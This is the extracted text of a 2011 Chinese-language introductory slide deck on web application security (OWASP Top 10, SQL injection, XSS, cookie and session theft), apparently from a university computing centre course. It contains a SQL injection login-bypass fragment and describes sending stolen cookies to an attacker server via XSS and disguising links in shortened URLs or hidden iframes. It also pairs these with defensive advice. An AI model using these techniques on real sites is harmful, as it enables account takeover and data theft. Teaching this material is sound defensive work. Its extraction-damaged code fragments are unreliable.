《中央大学电子计算机中心多媒体与网路应用资讯推广课程.ppt》由会员分享,可在线阅读,更多相关《中央大学电子计算机中心多媒体与网路应用资讯推广课程.ppt(53页珍藏版)》请在三一文库上搜索。
1、中央大學電子計算機中心 多媒體與網路應用 資訊推廣課程,網頁應用程式的安全入門,日期: 2011/03/27 講師:資工三 張竟 cwebb dot tw at gmail dot com,Agenda,嘴砲 OWSAP Top 10 SQL injection XSS cookie & session,2,Agenda,嘴砲 OWSAP Top 10 SQL injection XSS cookie & session,3,不要做壞事!,4,不要被抓到!,5,不要被抓到!,6,不要說我教的,7,Agenda,嘴砲 OWSAP Top 10 SQL injection XSS cookie &
2、 session,8,網頁安全?,早年 vs 現代 靜態 vs 動態 有程式 就有漏洞!,9,ways to attack,OS web server web application,10,attack scenarios,attack web server gain privilege steal informations to attack users attack other user steal informations execute other attacks may be composite,11,Agenda,嘴砲 OWSAP Top 10 SQL injection XSS
3、cookie & session,12,13,OWASP Top 10 - 2010,A1: Injection A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session Management A4: Insecure Direct Object References A5: Cross-Site Request Forgery (CSRF),14,OWASP Top 10 - 2010,A6: Security Misconfiguration A7: Insecure Cryptographic Storage
4、 A8: Failure to Restrict URL Access A9: Insufficient Transport Layer Protection A10: Unvalidated Redirects and Forwards,15,OWASP Top 10 - 2010,A1: Injection A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session Management A4: Insecure Direct Object References A5: Cross-Site Request Fo
5、rgery (CSRF),16,OWASP Top 10 - 2010,A6: Security Misconfiguration A7: Insecure Cryptographic Storage A8: Failure to Restrict URL Access A9: Insufficient Transport Layer Protection A10: Unvalidated Redirects and Forwards,17,Agenda,嘴砲 OWSAP Top 10 SQL injection XSS cookie & session,18,Injections,駭客的填空
6、遊戲 where can attacker inject? database (MySQL, MS SQL, PostgreSQL . ) no-sql Directory Service (LDAP) system command!,19,how SQL works in web,login page for example,client,web server,sql server,request whit id and pwd,select from account where id=id and pwd=pwd,return result,return login success/fai
7、led,20,Why SQL?,廣大使用 儲存大量的網站資料 injection friendly,21,how injections work?,以MySQL為例子 $query = “select from account where id=$id and pwd=$pwd $id= or 1=1 - select from account where id= - ,22,attack skills,union blind attack,23,影響,資料被偷/被改 獲得網站權限 整個網站被拿下#,24,how to defense,safe API 過濾逃脫字元 不要直接把使用者輸入加入q
8、uery 找程式掃描弱點,25,Practice,26,Agenda,嘴砲 OWSAP Top 10 SQL injection XSS cookie & session,27,XSS,Cross Site Scripting 在別人的網站上寫程式!,28,background knowledge,HTTP GET HTTP POST,29,how to attack,attack using POST/GET the “scripting” in the server strange url,30,how to attack,javascript / ,31,example,http:/ O
9、range”),32,what may happened?,take you to bad site send your information to attacker Just For Fun!,33,Just For Fun Samy,MySpace XSS attack Samy is my hero! Infection,34,Big Site also XSSable,MySpace Facebook twitter Plurk .,35,how to defense,for server 該逃的還是要逃 找程式掃描弱點 for user 看到奇怪連結要警覺 瀏覽器 / 防毒軟體,3
10、6,practice,37,Agenda,嘴砲 OWSAP Top 10 SQL injection XSS cookie & session,38,background knowledge,cookie session,A cookie is a piece of text stored by a users web browser. A cookie can be used for authentication, storing site preferences, shopping cart contents, the identifier for a server-based sessi
11、on, or anything else that can be accomplished through storing text data.,The session information is stored on the web server using the session identifier (session ID) generated as a result of the first (sometimes the first authenticated) request from the end user running a web browser. The “storage“
12、 of session IDs and the associated session data (user name, account number, etc.) on the web server is accomplished using a variety of techniques including, but not limited to: local memory, flat files, and databases.,39,40,41,如果偷到了cookie,可以,42,how to steal it?,43,44,把cookie送到雲端!,用GET / POST方式讓網頁把co
13、okie送走 / ex: “.join( sever side is simple just keep the cookie,45,哪個白痴 會點這鬼連結,http:/ ( / 0rz.tw / goo.gl / bit.ly) 塞進別的網頁裡 (ex: iframe長寬設0或1) ugly url EVERY WHERE,https:/ agent / header 綁IP *不要被攻擊成功*,48,鎖定user agent / header,if (isset($_SESSIONHTTP_USER_AGENT) if ($_SESSIONHTTP_USER_AGENT != md5($_SERVERHTTP_USER_AGENT) exit(); else $_SESSIONHTTP_USER_AGENT = md5($_SERVERHTTP_USER_AGENT);,但是. 當你偷的到cookie 會拿不到header嗎?,49,Practice,50,Q&A?,51,end,52,Reference,53,http:/www.owasp.org/ http:/en.wikipedia.org/ http:/goo.gl/cA3a http:/goo.gl/IwGbX http:/goo.gl/uQ4I1,